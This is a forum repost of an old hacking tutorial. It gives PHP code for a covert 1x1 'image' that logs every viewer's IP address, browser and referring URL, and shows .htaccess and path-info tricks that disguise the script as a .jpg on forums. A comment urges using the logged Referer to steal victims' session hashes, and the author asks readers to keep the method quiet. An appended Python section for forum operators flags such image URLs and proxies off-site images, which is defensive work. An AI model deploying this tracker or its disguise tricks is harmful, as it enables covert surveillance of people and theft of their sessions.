This is an old tutorial I had saved from older boards. This member was pretty active and knowledgeable back then, but after the fall of 1nj3ct, he went someplace and I haven't seen him since then. I couldn't contact him either; it would be pretty nice if he could come back.
Anyway, this is an old tutorial, so I'm sure he wouldn't mind me posting it.
.:Intro:.
Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com.
Hello mates. I have been working on a method of getting IPs and other info using the GD library.
.:The Code:.
OK, first we will use the GD library in PHP to generate a valid image. Here's some code to do just that:
<?php
/*
.:Made by t3hmadhatt3r -- t3hmadhatt3r@gmail.com:.
.:Please don't share! Keep this quiet!:.
.:Please be safe:.
.:Enjoy!:.
*/
// Defining Variables
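// Request headers are client-controlled and may be missing: default to ''
// and HTML-escape every value before it is written into the HTML log.
$IP = htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? '', ENT_QUOTES); // Saves the IP
$UA = htmlspecialchars($_SERVER['HTTP_USER_AGENT'] ?? '', ENT_QUOTES); // Saves the User Agent
$RE = htmlspecialchars($_SERVER['HTTP_REFERER'] ?? '', ENT_QUOTES); // Saves the Referer
$DATE = date('l jS \of F Y h:i:s A'); // Timestamp of the request
$DATA = '<p>IP: '.$IP.'<br/>User Agent: '.$UA.'<br/>Referer: '.$RE.'<br/>Date: '.$DATE.'</p><br/><br/>';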
/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/
// Writing the logs
$fp = fopen('Cool_Huh?.html', 'a');
fwrite($fp, $DATA);
fclose($fp);
// Behold the mighty GD Library ^_^
header("Content-type: image/png");
$img = imagecreate(1, 1); // 1x1 pixel canvas
$bg = imagecolorallocate($img, 0, 0, 0); // First allocated colour becomes the background (black)
imagepng($img); // Send the PNG to the client
// Later...
?>
More info about the PHP GD library at
http://us2.php.net/manual/en/book.image.php
.:Faking the Extension:.
Now we have a valid image, but how will we get it to work on forums that don't allow php as an image extension? Well, there are two ways, one of which is better than the other.
1. .htaccess (This is the best way)
If you are using a server that allows you to configure your own .htaccess file, then you can add the following line to execute all files with the .jpg extension as PHP files.
AddHandler application/x-httpd-php .jpg
Note: If you don't have a server that allows this, I recommend looking at
http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess.
Now you can rename the php file to jpg and it will still work! Tricky Aye?
2. Tricky Technique (This way works just the same but is suspicious)
This technique can be done on most servers (I tried it on t35 and got some permission errors... probably because of the jail shell), but it could get some attention from an admin pretty quickly. Just add a /image.jpg to the end of the PHP file.
Example:
http://subdomain.whatever.com/script.php/image.jpg
This will make it look like the extension is jpg, but the PHP will ignore it and execute normally.
.:Ending:.
Now you can embed this image in forums just like any other image.
Enjoy the code!
-- t3hmadhatt3r;
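
From the forum operator's side, the second trick can be spotted in the URL, but the .htaccess one cannot, so the dependable control is to fetch every off-site image through the forum itself. The following is an added example, not part of the original tutorial; the host name `forum.example`, the `/imgproxy?u=` endpoint and the BBCode `[img]` syntax are assumptions.

```python
import re
from urllib.parse import urlsplit, quote

# Assumed values for illustration (hypothetical forum and proxy endpoint).
FORUM_HOST = "forum.example"
PROXY_PREFIX = "/imgproxy?u="

SCRIPT_SEGMENT = re.compile(r"\.(php\d?|phtml|cgi|pl|asp|aspx|jsp)$", re.I)
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.I | re.S)

def classify(url):
    """Return (verdict, reasons) for one embedded image URL."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "reject", ["not an absolute http(s) URL"]
    if parts.hostname.lower() == FORUM_HOST:
        return "allow", ["same-site image"]
    reasons = ["third-party host sees viewer IP, User-Agent and Referer"]
    segments = [s for s in parts.path.split("/") if s]
    # The script.php/image.jpg form: a script name followed by extra path info.
    if any(SCRIPT_SEGMENT.search(s) for s in segments[:-1]):
        reasons.append("script segment before the final path component")
    if segments and SCRIPT_SEGMENT.search(segments[-1]):
        reasons.append("image URL ends in a script extension")
    # A handler mapping such as AddHandler leaves no trace in the URL, so a
    # clean-looking .jpg on another host is proxied as well.
    return "proxy", reasons

def rewrite_post(body):
    """Rewrite off-site [img] tags so viewers load them via the forum proxy."""
    def repl(match):
        url = match.group(1).strip()
        verdict, _ = classify(url)
        if verdict == "allow":
            return match.group(0)
        if verdict == "reject":
            return "[removed image]"
        return "[img]" + PROXY_PREFIX + quote(url, safe="") + "[/img]"
    return IMG_TAG.sub(repl, body)

if __name__ == "__main__":
    # Constructed sample post, using the example URL from the tutorial.
    post = ("hi [img]http://subdomain.whatever.com/script.php/image.jpg[/img] "
            "[img]https://forum.example/avatars/1.png[/img]")
    print(rewrite_post(post))
```

The proxy endpoint is expected to fetch and cache the image server-side without forwarding the viewer's cookies, User-Agent or Referer, so the remote host only ever logs the forum's own address. Keeping session identifiers out of URLs and sending a `Referrer-Policy` header covers the Referer leak for links the proxy does not handle.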